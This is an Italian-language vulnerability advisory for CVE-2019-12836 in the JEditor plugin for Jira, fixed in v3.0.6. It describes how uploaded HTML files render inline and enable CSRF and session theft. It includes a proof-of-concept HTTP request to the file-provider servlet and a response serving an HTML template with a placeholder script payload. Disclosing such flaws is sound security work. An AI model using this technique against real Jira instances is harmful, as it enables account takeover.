
CVE-2019-12836

JEditor v3.0.5 - Editor WYSIWYG per JIRA
Un editor di testo ricco semplice ma potente per Jira. Importa email HTML, incolla contenuti ricchi, crea modelli e precompila i campi.
Bobronix
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12836
JEditor - Editor WYSIWYG per Jira - v3.0.5
JEditor v3.0.5
L'editor Bobronix JEditor prima della v3.0.6 per Jira permette a un attaccante di aggiungere un URL/Link (a un problema esistente) che può causare la falsificazione di una richiesta verso un dominio di origine esterna. Ciò a sua volta può consentire una richiesta falsificata che può essere invocata nel contesto di un utente autenticato, portando al furto di token di sessione e al takeover dell'account.
JEditor v3.0.5 consente il caricamento di file di vari tipi di estensione, uno dei quali è '.HTML'. JEditor è utilizzato da JIRA per la sua funzionalità di caricamento file. Usando questa funzionalità un attaccante può caricare contenuti malevoli.
Una volta caricato il contenuto malevolo, può essere effettuata una richiesta successiva per il contenuto che ne consente la visualizzazione e il rendering inline nel contesto del browser di qualsiasi utente autenticato. Ciò può permettere a un attaccante di falsificare una richiesta malevola per conto di qualsiasi utente autenticato.
Cross Site Request Forgery (CSRF)
Bug risolto in JEditor v3.0.6
https://jeditor.zendesk.com/hc/en-us/articles/360029430751-JEditor-3-0-6-release-notes
Consente una richiesta falsificata che risulta in una possibile vettore di attacco lato client
Utente autenticato necessario per interagire con il link/URL incorporato
Crediti: Victor Hanna (Exploit Security)
GET /plugins/servlet/jeditor_file_provider?imgId=ckupload201906162566696393384747423&fileName=C%3A%5Ctemp%5CPOC.html HTTP/1.1
Host: <vulnerable host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0)
Accept: text/html,application/xhtml_xml,application/xml;q=0.9,*/*;q=0.8
Accept-Langauge: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<vulnerable host>/secure/Dashboard.jspa
DNT: 1
Connection: close
Cookie: atlassian.xsrf.token=BNXD-VY4I-RCJA-J3YA_34d13dd7fae0f32023fc89838ldc0b6c35991382_lin; JSESSION=42E9F5581BAE499E3E9E45B9D44E6F3C
Upgrade-Insecure-Requests: 1
HTTP/1.1 200
Server: nginx/1.10.2
Date: Sun, 16 Jun 2019 03:06:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
X-AREQUESTID: 786x226666x1
X-ASESSIONID: pn6xpm
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-ASEN: SEN-2322842
X-Seraph-LoginReason: OK
X-AUSERNAME:
Content-Disposition: inline; filename="C:\temp\POC.html"
Vary: User-Agent
Content-Length: 236
<html>
<head>
<img src="http://{insert external image location here}">
<script>{JS Payload of any description}</script>
</head>
<body>
<h1>
Welcome to the Jungle !
</h1>
</body>
</html>
Victor Hanna di Exploit Security